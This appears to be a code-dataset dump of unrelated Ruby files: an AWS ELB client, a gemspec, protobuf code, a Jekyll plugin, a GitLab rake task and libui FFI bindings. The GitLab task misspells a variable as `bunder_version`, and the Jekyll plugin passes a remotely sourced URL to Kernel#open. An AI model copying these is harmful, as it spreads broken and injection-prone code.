# which the EC2 instance is listening with a new set of policies. At
# this time, only the back-end server authentication policy type can be
# applied to the instance ports; this policy type is composed of
# multiple public key policies.
#
# Each time you use `SetLoadBalancerPoliciesForBackendServer` to enable
# the policies, use the `PolicyNames` parameter to list the policies
# that you want to enable.
#
# You can use DescribeLoadBalancers or DescribeLoadBalancerPolicies to
# verify that the policy is associated with the EC2 instance.
#
# For more information about enabling back-end instance authentication,
# see [Configure Back-end Instance Authentication][1] in the *Classic
# Load Balancers Guide*. For more information about Proxy Protocol, see
# [Configure Proxy Protocol Support][2] in the *Classic Load Balancers
# Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-create-https-ssl-load-balancer.html#configure_backendauth_clt
# [2]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/enable-proxy-protocol.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Integer] :instance_port
# The port number associated with the EC2 instance.
#
# @option params [required, Array<String>] :policy_names
# The names of the policies. If the list is empty, then all current
    # policies are removed from the EC2 instance.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To replace the policies associated with a port for a backend instance
#
# # This example replaces the policies that are currently associated with the specified port.
#
# resp = client.set_load_balancer_policies_for_backend_server({
# instance_port: 80,
# load_balancer_name: "my-load-balancer",
# policy_names: [
# "my-ProxyProtocol-policy",
# ],
# })
#
# @example Request syntax with placeholder values
#
# resp = client.set_load_balancer_policies_for_backend_server({
# load_balancer_name: "AccessPointName", # required
# instance_port: 1, # required
# policy_names: ["PolicyName"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/SetLoadBalancerPoliciesForBackendServer AWS API Documentation
#
# @overload set_load_balancer_policies_for_backend_server(params = {})
# @param [Hash] params ({})
def set_load_balancer_policies_for_backend_server(params = {}, options = {})
req = build_request(:set_load_balancer_policies_for_backend_server, params)
req.send_request(options)
end
# Replaces the current set of policies for the specified load balancer
# port with the specified set of policies.
#
# To enable back-end server authentication, use
# SetLoadBalancerPoliciesForBackendServer.
#
# For more information about setting policies, see [Update the SSL
# Negotiation Configuration][1], [Duration-Based Session Stickiness][2],
# and [Application-Controlled Session Stickiness][3] in the *Classic
# Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/ssl-config-update.html
# [2]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-sticky-sessions.html#enable-sticky-sessions-duration
# [3]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-sticky-sessions.html#enable-sticky-sessions-application
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Integer] :load_balancer_port
# The external port of the load balancer.
#
# @option params [required, Array<String>] :policy_names
# The names of the policies. This list must include all policies to be
# enabled. If you omit a policy that is currently enabled, it is
# disabled. If the list is empty, all current policies are disabled.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To replace the policies associated with a listener
#
# # This example replaces the policies that are currently associated with the specified listener.
#
# resp = client.set_load_balancer_policies_of_listener({
# load_balancer_name: "my-load-balancer",
# load_balancer_port: 80,
# policy_names: [
# "my-SSLNegotiation-policy",
# ],
# })
#
# @example Request syntax with placeholder values
#
# resp = client.set_load_balancer_policies_of_listener({
# load_balancer_name: "AccessPointName", # required
# load_balancer_port: 1, # required
# policy_names: ["PolicyName"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/SetLoadBalancerPoliciesOfListener AWS API Documentation
#
# @overload set_load_balancer_policies_of_listener(params = {})
# @param [Hash] params ({})
def set_load_balancer_policies_of_listener(params = {}, options = {})
req = build_request(:set_load_balancer_policies_of_listener, params)
req.send_request(options)
end
# @!endgroup
# @param params ({})
# @api private
def build_request(operation_name, params = {})
handlers = @handlers.for(operation_name)
context = Seahorse::Client::RequestContext.new(
operation_name: operation_name,
operation: config.api.operation(operation_name),
client: self,
params: params,
config: config)
context[:gem_name] = 'aws-sdk-elasticloadbalancing'
context[:gem_version] = '1.14.0'
Seahorse::Client::Request.new(handlers, context)
end
# Polls an API operation until a resource enters a desired state.
#
# ## Basic Usage
#
# A waiter will call an API operation until:
#
# * It is successful
# * It enters a terminal state
# * It makes the maximum number of attempts
#
# In between attempts, the waiter will sleep.
#
# # polls in a loop, sleeping between attempts
# client.wait_until(waiter_name, params)
#
# ## Configuration
#
# You can configure the maximum number of polling attempts, and the
# delay (in seconds) between each polling attempt. You can pass
# configuration as the final arguments hash.
#
# # poll for ~25 seconds
# client.wait_until(waiter_name, params, {
# max_attempts: 5,
# delay: 5,
# })
#
# ## Callbacks
#
# You can be notified before each polling attempt and before each
# delay. If you throw `:success` or `:failure` from these callbacks,
# it will terminate the waiter.
#
# started_at = Time.now
# client.wait_until(waiter_name, params, {
#
# # disable max attempts
# max_attempts: nil,
#
# # poll for 1 hour, instead of a number of attempts
# before_wait: -> (attempts, response) do
# throw :failure if Time.now - started_at > 3600
# end
# })
#
# ## Handling Errors
#
# When a waiter is unsuccessful, it will raise an error.
# All of the failure errors extend from
# {Aws::Waiters::Errors::WaiterFailed}.
#
# begin
# client.wait_until(...)
# rescue Aws::Waiters::Errors::WaiterFailed
# # resource did not enter the desired state in time
# end
#
# ## Valid Waiters
#
# The following table lists the valid waiter names, the operations they call,
# and the default `:delay` and `:max_attempts` values.
#
# | waiter_name | params | :delay | :max_attempts |
# | ----------------------- | --------------------------- | -------- | ------------- |
# | any_instance_in_service | {#describe_instance_health} | 15 | 40 |
# | instance_deregistered | {#describe_instance_health} | 15 | 40 |
# | instance_in_service | {#describe_instance_health} | 15 | 40 |
#
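    # For example, a hand-written (non-generated) call that waits for a
    # placeholder instance to pass health checks on a placeholder load
    # balancer:
    #
    #     client.wait_until(:instance_in_service, {
    #       load_balancer_name: "my-load-balancer",
    #       instances: [{ instance_id: "i-d6f6fae3" }],
    #     })
    #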
# @raise [Errors::FailureStateError] Raised when the waiter terminates
# because the waiter has entered a state that it will not transition
# out of, preventing success.
#
# @raise [Errors::TooManyAttemptsError] Raised when the configured
# maximum number of attempts have been made, and the waiter is not
# yet successful.
#
    # @raise [Errors::UnexpectedError] Raised when an error is encountered
# while polling for a resource that is not expected.
#
# @raise [Errors::NoSuchWaiterError] Raised when you request to wait
# for an unknown state.
#
# @return [Boolean] Returns `true` if the waiter was successful.
# @param [Symbol] waiter_name
# @param [Hash] params ({})
# @param [Hash] options ({})
# @option options [Integer] :max_attempts
# @option options [Integer] :delay
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
def wait_until(waiter_name, params = {}, options = {})
w = waiter(waiter_name, options)
yield(w.waiter) if block_given? # deprecated
w.wait(params)
end
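# A minimal, hypothetical usage sketch for the waiters documented above.
# The load balancer name and instance ID are illustrative; the waiter names
# and their default :delay/:max_attempts come from the table in the comment
# above, and the params hash is the input to #describe_instance_health:
#
#   client = Aws::ElasticLoadBalancing::Client.new
#   client.wait_until(:instance_in_service,
#     { load_balancer_name: 'my-load-balancer',
#       instances: [{ instance_id: 'i-0123456789abcdef0' }] },
#     max_attempts: 20, delay: 15)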
# @api private
# @deprecated
def waiter_names
waiters.keys
end
private
# @param [Symbol] waiter_name
# @param [Hash] options ({})
def waiter(waiter_name, options = {})
waiter_class = waiters[waiter_name]
if waiter_class
waiter_class.new(options.merge(client: self))
else
raise Aws::Waiters::Errors::NoSuchWaiterError.new(waiter_name, waiters.keys)
end
end
def waiters
{
any_instance_in_service: Waiters::AnyInstanceInService,
instance_deregistered: Waiters::InstanceDeregistered,
instance_in_service: Waiters::InstanceInService
}
end
class << self
# @api private
attr_reader :identifier
# @api private
def errors_module
Errors
end
end
end
end
| 39.449607 | 427 | 0.638032 |
1d570bd8f78000090960451b86da224870f386be | 1,015 | # -*- encoding: utf-8 -*-
# stub: delegate 0.2.0 ruby lib
Gem::Specification.new do |s|
s.name = "delegate".freeze
s.version = "0.2.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "homepage_uri" => "https://github.com/ruby/delegate", "source_code_uri" => "https://github.com/ruby/delegate" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["Yukihiro Matsumoto".freeze]
s.bindir = "exe".freeze
s.date = "2021-07-06"
s.description = "Provides three abilities to delegate method calls to an object.".freeze
s.email = ["[email protected]".freeze]
s.files = ["delegate.rb".freeze]
s.homepage = "https://github.com/ruby/delegate".freeze
s.licenses = ["Ruby".freeze, "BSD-2-Clause".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.7".freeze)
s.rubygems_version = "3.2.15".freeze
s.summary = "Provides three abilities to delegate method calls to an object.".freeze
end
| 44.130435 | 156 | 0.695567 |
33316b92297db5fa47bfe8a5b7cd15e965f38a9e | 119 | require 'pry'
require_relative '../config/environment'
require_relative 'methods.rb'
require 'io/console'
first_prompt | 19.833333 | 40 | 0.806723 |
79f72b820a658eb91b32c9edcbae60ce17bab0bd | 1,050 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v5/errors/time_zone_error.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v5/errors/time_zone_error.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v5.errors.TimeZoneErrorEnum" do
end
add_enum "google.ads.googleads.v5.errors.TimeZoneErrorEnum.TimeZoneError" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :INVALID_TIME_ZONE, 5
end
end
end
module Google
module Ads
module GoogleAds
module V5
module Errors
TimeZoneErrorEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v5.errors.TimeZoneErrorEnum").msgclass
TimeZoneErrorEnum::TimeZoneError = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v5.errors.TimeZoneErrorEnum.TimeZoneError").enummodule
end
end
end
end
end
| 33.870968 | 178 | 0.745714 |
5daebbcf6fcdeda8565a1315527f1bd1db2ddde4 | 2,420 | require 'metainspector'
require 'open-uri'
require 'mini_magick'
module Jekyll
class SocialCardTag < Liquid::Tag
def initialize(tag_name, text, options)
super
@card_url = text
end
def render(context)
site = context.registers[:site]
baseurl = site.baseurl
@@properties ||= {}
@@properties[@card_url] ||= get_properties(@card_url)
properties = @@properties[@card_url]
title = properties['og:title'].first
if title.split.last == 'Blog'
long_title_length = title.split.length-4
title = title.split[0..long_title_length].join(" ")
if title.length > 84
title = title[0..84] + "..."
end
end
image_url = properties['og:image'].first
published_at = properties['article:published_time'].first
published_at = Date.parse(published_at).strftime('%B %d, %Y')
# We need to download the image so we can serve it directly and avoid
# mixed-mode SSL warnings. Also cache it for Jekyll build performance.
filename = "#{File.basename(image_url, File.extname(image_url))}.jpg"
image_dir = "images/blog"
image_path = "#{image_dir}/#{filename}"
output_dir = "_tmp/#{image_dir}"
output_path = "#{output_dir}/#{filename}"
unless File.exist?(output_path)
FileUtils.mkdir_p(output_dir) unless Dir.exist?(output_dir)
download_file(image_url, output_path)
end
site.static_files << Jekyll::StaticFile.new(site, '_tmp', image_dir, filename)
<<-HEREDOC
<div class="col-xs-6 col-sm-6 col-md-4" style="text-decoration: none!important;">
<a href="#{@card_url}" title="#{title}" class="post-teaser lang-tile lang-tile-large" style="text-decoration: none!important;">
<div style="min-height:60%"><img class="larger_icon" src="#{baseurl}/#{image_path}" alt="icon" itemprop="image"></div>
<p itemprop="name" class="lg text-primary">#{title}</p>
</a>
</div>
HEREDOC
end
def get_properties(url)
page = MetaInspector.new(url)
page.meta_tags['property']
end
def download_file(url, path)
stream = open(url.sub(/^\/\//, 'https://'))
image = MiniMagick::Image.read(stream)
image.format "jpg"
image.resize "768x768>"
image.write path
end
end
end
Liquid::Template.register_tag('socialcard', Jekyll::SocialCardTag)
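# Hypothetical usage from a Jekyll post or page (the URL is illustrative);
# the raw tag text becomes @card_url in the tag's initializer above:
#
#   {% socialcard https://blog.example.com/2020/01/some-post/ %}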
| 32.266667 | 135 | 0.624793 |
f7c831892ee28e89eb51ffcc9c37450c5559640e | 3,261 | namespace :gitlab do
namespace :env do
desc "GitLab | Show information about GitLab and its environment"
task info: :environment do
# check if there is an RVM environment
rvm_version = run_and_match(%W(rvm --version), /[\d\.]+/).try(:to_s)
# check Ruby version
ruby_version = run_and_match(%W(ruby --version), /[\d\.p]+/).try(:to_s)
# check Gem version
gem_version = run_command(%W(gem --version))
# check Bundler version
bundler_version = run_and_match(%W(bundle --version), /[\d\.]+/).try(:to_s)
# check Rake version
rake_version = run_and_match(%W(rake --version), /[\d\.]+/).try(:to_s)
# check redis version
redis_version = run_and_match(%W(redis-cli --version), /redis-cli (\d+\.\d+\.\d+)/).to_a
puts ""
puts "System information".color(:yellow)
puts "System:\t\t#{os_name || "unknown".color(:red)}"
puts "Current User:\t#{run_command(%W(whoami))}"
puts "Using RVM:\t#{rvm_version.present? ? "yes".color(:green) : "no"}"
puts "RVM Version:\t#{rvm_version}" if rvm_version.present?
puts "Ruby Version:\t#{ruby_version || "unknown".color(:red)}"
puts "Gem Version:\t#{gem_version || "unknown".color(:red)}"
puts "Bundler Version:#{bunder_version || "unknown".color(:red)}"
puts "Rake Version:\t#{rake_version || "unknown".color(:red)}"
puts "Redis Version:\t#{redis_version[1] || "unknown".color(:red)}"
puts "Sidekiq Version:#{Sidekiq::VERSION}"
# check database adapter
database_adapter = ActiveRecord::Base.connection.adapter_name.downcase
project = Group.new(path: "some-group").projects.build(path: "some-project")
# construct clone URLs
http_clone_url = project.http_url_to_repo
ssh_clone_url = project.ssh_url_to_repo
omniauth_providers = Gitlab.config.omniauth.providers
omniauth_providers.map! { |provider| provider['name'] }
puts ""
puts "GitLab information".color(:yellow)
puts "Version:\t#{Gitlab::VERSION}"
puts "Revision:\t#{Gitlab::REVISION}"
puts "Directory:\t#{Rails.root}"
puts "DB Adapter:\t#{database_adapter}"
puts "URL:\t\t#{Gitlab.config.gitlab.url}"
puts "HTTP Clone URL:\t#{http_clone_url}"
puts "SSH Clone URL:\t#{ssh_clone_url}"
puts "Using LDAP:\t#{Gitlab.config.ldap.enabled ? "yes".color(:green) : "no"}"
puts "Using Omniauth:\t#{Gitlab.config.omniauth.enabled ? "yes".color(:green) : "no"}"
puts "Omniauth Providers: #{omniauth_providers.join(', ')}" if Gitlab.config.omniauth.enabled
# check GitLab Shell version
gitlab_shell_version_file = "#{Gitlab.config.gitlab_shell.hooks_path}/../VERSION"
if File.readable?(gitlab_shell_version_file)
gitlab_shell_version = File.read(gitlab_shell_version_file)
end
puts ""
puts "GitLab Shell".color(:yellow)
puts "Version:\t#{gitlab_shell_version || "unknown".color(:red)}"
puts "Repository storage paths:"
Gitlab.config.repositories.storages.each do |name, path|
puts "- #{name}: \t#{path}"
end
puts "Hooks:\t\t#{Gitlab.config.gitlab_shell.hooks_path}"
puts "Git:\t\t#{Gitlab.config.git.bin_path}"
end
end
end
| 41.807692 | 99 | 0.644588 |
396dfd50646289d7fa08825f5be07bce0a6832ae | 25,897 | require 'fiddle/import'
require_relative 'fiddle_patch'
module LibUI
module FFI
extend Fiddle::Importer
extend FiddlePatch
begin
dlload LibUI.ffi_lib
rescue LoadError
raise LoadError, 'Could not find libui shared library'
end
class << self
attr_reader :func_map
def try_extern(signature, *opts)
extern(signature, *opts)
rescue StandardError => e
warn "#{e.class.name}: #{e.message}"
end
def ffi_methods
@ffi_methods ||= func_map.each_key.to_a
end
end
typealias('uint32_t', 'unsigned int')
InitOptions = struct [
'size_t Size'
]
# https://github.com/andlabs/libui/blob/master/ui.h
# keep same order
try_extern 'const char *uiInit(uiInitOptions *options)'
try_extern 'void uiUninit(void)'
try_extern 'void uiFreeInitError(const char *err)'
try_extern 'void uiMain(void)'
try_extern 'void uiMainSteps(void)'
try_extern 'int uiMainStep(int wait)'
try_extern 'void uiQuit(void)'
try_extern 'void uiQueueMain(void (*f)(void *data), void *data)'
try_extern 'void uiTimer(int milliseconds, int (*f)(void *data), void *data)'
try_extern 'void uiOnShouldQuit(int (*f)(void *data), void *data)'
try_extern 'void uiFreeText(char *text)'
Control = struct [
'uint32_t Signature',
'uint32_t OSSignature',
'uint32_t TypeSignature',
'void (*Destroy)(uiControl *)',
'uintptr_t (*Handle)(uiControl *)',
'uiControl *(*Parent)(uiControl *)',
'void (*SetParent)(uiControl *, uiControl *)',
'int (*Toplevel)(uiControl *)',
'int (*Visible)(uiControl *)',
'void (*Show)(uiControl *)',
'void (*Hide)(uiControl *)',
'int (*Enabled)(uiControl *)',
'void (*Enable)(uiControl *)',
'void (*Disable)(uiControl *)'
]
try_extern 'void uiControlDestroy(uiControl *)'
try_extern 'uintptr_t uiControlHandle(uiControl *)'
try_extern 'uiControl *uiControlParent(uiControl *)'
try_extern 'void uiControlSetParent(uiControl *, uiControl *)'
try_extern 'int uiControlToplevel(uiControl *)'
try_extern 'int uiControlVisible(uiControl *)'
try_extern 'void uiControlShow(uiControl *)'
try_extern 'void uiControlHide(uiControl *)'
try_extern 'int uiControlEnabled(uiControl *)'
try_extern 'void uiControlEnable(uiControl *)'
try_extern 'void uiControlDisable(uiControl *)'
try_extern 'uiControl *uiAllocControl(size_t n, uint32_t OSsig, uint32_t typesig, const char *typenamestr)'
try_extern 'void uiFreeControl(uiControl *)'
try_extern 'void uiControlVerifySetParent(uiControl *, uiControl *)'
try_extern 'int uiControlEnabledToUser(uiControl *)'
try_extern 'void uiUserBugCannotSetParentOnToplevel(const char *type)'
# uiWindow
try_extern 'char *uiWindowTitle(uiWindow *w)'
try_extern 'void uiWindowSetTitle(uiWindow *w, const char *title)'
try_extern 'void uiWindowContentSize(uiWindow *w, int *width, int *height)'
try_extern 'void uiWindowSetContentSize(uiWindow *w, int width, int height)'
try_extern 'int uiWindowFullscreen(uiWindow *w)'
try_extern 'void uiWindowSetFullscreen(uiWindow *w, int fullscreen)'
try_extern 'void uiWindowOnContentSizeChanged(uiWindow *w, void (*f)(uiWindow *, void *), void *data)'
try_extern 'void uiWindowOnClosing(uiWindow *w, int (*f)(uiWindow *w, void *data), void *data)'
try_extern 'int uiWindowBorderless(uiWindow *w)'
try_extern 'void uiWindowSetBorderless(uiWindow *w, int borderless)'
try_extern 'void uiWindowSetChild(uiWindow *w, uiControl *child)'
try_extern 'int uiWindowMargined(uiWindow *w)'
try_extern 'void uiWindowSetMargined(uiWindow *w, int margined)'
try_extern 'uiWindow *uiNewWindow(const char *title, int width, int height, int hasMenubar)'
# uiButton
try_extern 'char *uiButtonText(uiButton *b)'
try_extern 'void uiButtonSetText(uiButton *b, const char *text)'
try_extern 'void uiButtonOnClicked(uiButton *b, void (*f)(uiButton *b, void *data), void *data)'
try_extern 'uiButton *uiNewButton(const char *text)'
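# A hypothetical smoke test for the raw bindings declared so far. It assumes
# the libui shared library was loaded by dlload above and uses
# Fiddle::Closure::BlockCaller for the C callback:
#
#   opts = LibUI::FFI::InitOptions.malloc
#   LibUI::FFI.uiInit(opts)
#   win = LibUI::FFI.uiNewWindow('Demo', 320, 240, 0)
#   on_closing = Fiddle::Closure::BlockCaller.new(
#     Fiddle::TYPE_INT, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP]
#   ) { |_w, _data| LibUI::FFI.uiQuit; 1 }
#   LibUI::FFI.uiWindowOnClosing(win, on_closing, nil)
#   LibUI::FFI.uiControlShow(win)
#   LibUI::FFI.uiMain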
# uiBox
try_extern 'void uiBoxAppend(uiBox *b, uiControl *child, int stretchy)'
try_extern 'void uiBoxDelete(uiBox *b, int index)'
try_extern 'int uiBoxPadded(uiBox *b)'
try_extern 'void uiBoxSetPadded(uiBox *b, int padded)'
try_extern 'uiBox *uiNewHorizontalBox(void)'
try_extern 'uiBox *uiNewVerticalBox(void)'
# uiCheckbox
try_extern 'char *uiCheckboxText(uiCheckbox *c)'
try_extern 'void uiCheckboxSetText(uiCheckbox *c, const char *text)'
try_extern 'void uiCheckboxOnToggled(uiCheckbox *c, void (*f)(uiCheckbox *c, void *data), void *data)'
try_extern 'int uiCheckboxChecked(uiCheckbox *c)'
try_extern 'void uiCheckboxSetChecked(uiCheckbox *c, int checked)'
try_extern 'uiCheckbox *uiNewCheckbox(const char *text)'
# uiEntry
try_extern 'char *uiEntryText(uiEntry *e)'
try_extern 'void uiEntrySetText(uiEntry *e, const char *text)'
try_extern 'void uiEntryOnChanged(uiEntry *e, void (*f)(uiEntry *e, void *data), void *data)'
try_extern 'int uiEntryReadOnly(uiEntry *e)'
try_extern 'void uiEntrySetReadOnly(uiEntry *e, int readonly)'
try_extern 'uiEntry *uiNewEntry(void)'
try_extern 'uiEntry *uiNewPasswordEntry(void)'
try_extern 'uiEntry *uiNewSearchEntry(void)'
# uiLabel
try_extern 'char *uiLabelText(uiLabel *l)'
try_extern 'void uiLabelSetText(uiLabel *l, const char *text)'
try_extern 'uiLabel *uiNewLabel(const char *text)'
# uiTab
try_extern 'void uiTabAppend(uiTab *t, const char *name, uiControl *c)'
try_extern 'void uiTabInsertAt(uiTab *t, const char *name, int before, uiControl *c)'
try_extern 'void uiTabDelete(uiTab *t, int index)'
try_extern 'int uiTabNumPages(uiTab *t)'
try_extern 'int uiTabMargined(uiTab *t, int page)'
try_extern 'void uiTabSetMargined(uiTab *t, int page, int margined)'
try_extern 'uiTab *uiNewTab(void)'
# uiGroup
try_extern 'char *uiGroupTitle(uiGroup *g)'
try_extern 'void uiGroupSetTitle(uiGroup *g, const char *title)'
try_extern 'void uiGroupSetChild(uiGroup *g, uiControl *c)'
try_extern 'int uiGroupMargined(uiGroup *g)'
try_extern 'void uiGroupSetMargined(uiGroup *g, int margined)'
try_extern 'uiGroup *uiNewGroup(const char *title)'
# uiSpinbox
try_extern 'int uiSpinboxValue(uiSpinbox *s)'
try_extern 'void uiSpinboxSetValue(uiSpinbox *s, int value)'
try_extern 'void uiSpinboxOnChanged(uiSpinbox *s, void (*f)(uiSpinbox *s, void *data), void *data)'
try_extern 'uiSpinbox *uiNewSpinbox(int min, int max)'
# uiSlider
try_extern 'int uiSliderValue(uiSlider *s)'
try_extern 'void uiSliderSetValue(uiSlider *s, int value)'
try_extern 'void uiSliderOnChanged(uiSlider *s, void (*f)(uiSlider *s, void *data), void *data)'
try_extern 'uiSlider *uiNewSlider(int min, int max)'
# uiProgressBar
try_extern 'int uiProgressBarValue(uiProgressBar *p)'
try_extern 'void uiProgressBarSetValue(uiProgressBar *p, int n)'
try_extern 'uiProgressBar *uiNewProgressBar(void)'
# uiSeparator
try_extern 'uiSeparator *uiNewHorizontalSeparator(void)'
try_extern 'uiSeparator *uiNewVerticalSeparator(void)'
# uiCombobox
try_extern 'void uiComboboxAppend(uiCombobox *c, const char *text)'
try_extern 'int uiComboboxSelected(uiCombobox *c)'
try_extern 'void uiComboboxSetSelected(uiCombobox *c, int n)'
try_extern 'void uiComboboxOnSelected(uiCombobox *c, void (*f)(uiCombobox *c, void *data), void *data)'
try_extern 'uiCombobox *uiNewCombobox(void)'
# uiEditableCombobox
try_extern 'void uiEditableComboboxAppend(uiEditableCombobox *c, const char *text)'
try_extern 'char *uiEditableComboboxText(uiEditableCombobox *c)'
try_extern 'void uiEditableComboboxSetText(uiEditableCombobox *c, const char *text)'
try_extern 'void uiEditableComboboxOnChanged(uiEditableCombobox *c, void (*f)(uiEditableCombobox *c, void *data), void *data)'
try_extern 'uiEditableCombobox *uiNewEditableCombobox(void)'
# uiRadioButtons
try_extern 'void uiRadioButtonsAppend(uiRadioButtons *r, const char *text)'
try_extern 'int uiRadioButtonsSelected(uiRadioButtons *r)'
try_extern 'void uiRadioButtonsSetSelected(uiRadioButtons *r, int n)'
try_extern 'void uiRadioButtonsOnSelected(uiRadioButtons *r, void (*f)(uiRadioButtons *, void *), void *data)'
try_extern 'uiRadioButtons *uiNewRadioButtons(void)'
# uiDateTimePicker
# time.h
TM = if Fiddle::WINDOWS
struct [
'int tm_sec',
'int tm_min',
'int tm_hour',
'int tm_mday',
'int tm_mon',
'int tm_year',
'int tm_wday',
'int tm_yday',
'int tm_isdst'
]
else # The GNU C Library (glibc)
struct [
'int tm_sec',
'int tm_min',
'int tm_hour',
'int tm_mday',
'int tm_mon',
'int tm_year',
'int tm_wday',
'int tm_yday',
'int tm_isdst',
'long tm_gmtoff',
'const char *tm_zone'
]
end
try_extern 'void uiDateTimePickerTime(uiDateTimePicker *d, struct tm *time)'
try_extern 'void uiDateTimePickerSetTime(uiDateTimePicker *d, const struct tm *time)'
try_extern 'void uiDateTimePickerOnChanged(uiDateTimePicker *d, void (*f)(uiDateTimePicker *, void *), void *data)'
try_extern 'uiDateTimePicker *uiNewDateTimePicker(void)'
try_extern 'uiDateTimePicker *uiNewDatePicker(void)'
try_extern 'uiDateTimePicker *uiNewTimePicker(void)'
# uiMultilineEntry
try_extern 'char *uiMultilineEntryText(uiMultilineEntry *e)'
try_extern 'void uiMultilineEntrySetText(uiMultilineEntry *e, const char *text)'
try_extern 'void uiMultilineEntryAppend(uiMultilineEntry *e, const char *text)'
try_extern 'void uiMultilineEntryOnChanged(uiMultilineEntry *e, void (*f)(uiMultilineEntry *e, void *data), void *data)'
try_extern 'int uiMultilineEntryReadOnly(uiMultilineEntry *e)'
try_extern 'void uiMultilineEntrySetReadOnly(uiMultilineEntry *e, int readonly)'
try_extern 'uiMultilineEntry *uiNewMultilineEntry(void)'
try_extern 'uiMultilineEntry *uiNewNonWrappingMultilineEntry(void)'
# uiMenuItem
try_extern 'void uiMenuItemEnable(uiMenuItem *m)'
try_extern 'void uiMenuItemDisable(uiMenuItem *m)'
try_extern 'void uiMenuItemOnClicked(uiMenuItem *m, void (*f)(uiMenuItem *sender, uiWindow *window, void *data), void *data)'
try_extern 'int uiMenuItemChecked(uiMenuItem *m)'
try_extern 'void uiMenuItemSetChecked(uiMenuItem *m, int checked)'
# uiMenu
try_extern 'uiMenuItem *uiMenuAppendItem(uiMenu *m, const char *name)'
try_extern 'uiMenuItem *uiMenuAppendCheckItem(uiMenu *m, const char *name)'
try_extern 'uiMenuItem *uiMenuAppendQuitItem(uiMenu *m)'
try_extern 'uiMenuItem *uiMenuAppendPreferencesItem(uiMenu *m)'
try_extern 'uiMenuItem *uiMenuAppendAboutItem(uiMenu *m)'
try_extern 'void uiMenuAppendSeparator(uiMenu *m)'
try_extern 'uiMenu *uiNewMenu(const char *name)'
try_extern 'char *uiOpenFile(uiWindow *parent)'
try_extern 'char *uiSaveFile(uiWindow *parent)'
try_extern 'void uiMsgBox(uiWindow *parent, const char *title, const char *description)'
try_extern 'void uiMsgBoxError(uiWindow *parent, const char *title, const char *description)'
# uiArea
AreaHandler = struct [
'void (*Draw)(uiAreaHandler *, uiArea *, uiAreaDrawParams *)',
'void (*MouseEvent)(uiAreaHandler *, uiArea *, uiAreaMouseEvent *)',
'void (*MouseCrossed)(uiAreaHandler *, uiArea *, int left)',
'void (*DragBroken)(uiAreaHandler *, uiArea *)',
'int (*KeyEvent)(uiAreaHandler *, uiArea *, uiAreaKeyEvent *)'
]
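# A hypothetical sketch of wiring this handler struct to Ruby blocks with
# Fiddle closures before handing it to uiNewArea (declared below). Only the
# Draw slot is shown; the other four callbacks are assigned the same way:
#
#   handler = LibUI::FFI::AreaHandler.malloc
#   handler.Draw = Fiddle::Closure::BlockCaller.new(
#     Fiddle::TYPE_VOID,
#     [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP]
#   ) { |_handler, _area, _draw_params| }
#   area = LibUI::FFI.uiNewArea(handler)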
typealias 'uiWindowResizeEdge', 'int'
try_extern 'void uiAreaSetSize(uiArea *a, int width, int height)'
try_extern 'void uiAreaQueueRedrawAll(uiArea *a)'
try_extern 'void uiAreaScrollTo(uiArea *a, double x, double y, double width, double height)'
try_extern 'void uiAreaBeginUserWindowMove(uiArea *a)'
try_extern 'void uiAreaBeginUserWindowResize(uiArea *a, uiWindowResizeEdge edge)'
try_extern 'uiArea *uiNewArea(uiAreaHandler *ah)'
try_extern 'uiArea *uiNewScrollingArea(uiAreaHandler *ah, int width, int height)'
AreaDrawParams = struct [
'uiDrawContext *Context',
'double AreaWidth',
'double AreaHeight',
'double ClipX',
'double ClipY',
'double ClipWidth',
'double ClipHeight'
]
typealias 'uiDrawBrushType', 'int'
typealias 'uiDrawLineCap', 'int'
typealias 'uiDrawLineJoin', 'int'
typealias 'uiDrawFillMode', 'int'
DrawMatrix = struct [
'double M11',
'double M12',
'double M21',
'double M22',
'double M31',
'double M32'
]
DrawBrush = struct [
'uiDrawBrushType Type',
'double R',
'double G',
'double B',
'double A',
'double X0',
'double Y0',
'double X1',
'double Y1',
'double OuterRadius',
'uiDrawBrushGradientStop *Stops',
'size_t NumStops'
]
DrawBrushGradientStop = struct [
'double Pos',
'double R',
'double G',
'double B',
'double A'
]
DrawStrokeParams = struct [
'uiDrawLineCap Cap',
'uiDrawLineJoin Join',
'double Thickness',
'double MiterLimit',
'double *Dashes',
'size_t NumDashes',
'double DashPhase'
]
# uiDrawPath
try_extern 'uiDrawPath *uiDrawNewPath(uiDrawFillMode fillMode)'
try_extern 'void uiDrawFreePath(uiDrawPath *p)'
try_extern 'void uiDrawPathNewFigure(uiDrawPath *p, double x, double y)'
try_extern 'void uiDrawPathNewFigureWithArc(uiDrawPath *p, double xCenter, double yCenter, double radius, double startAngle, double sweep, int negative)'
try_extern 'void uiDrawPathLineTo(uiDrawPath *p, double x, double y)'
try_extern 'void uiDrawPathArcTo(uiDrawPath *p, double xCenter, double yCenter, double radius, double startAngle, double sweep, int negative)'
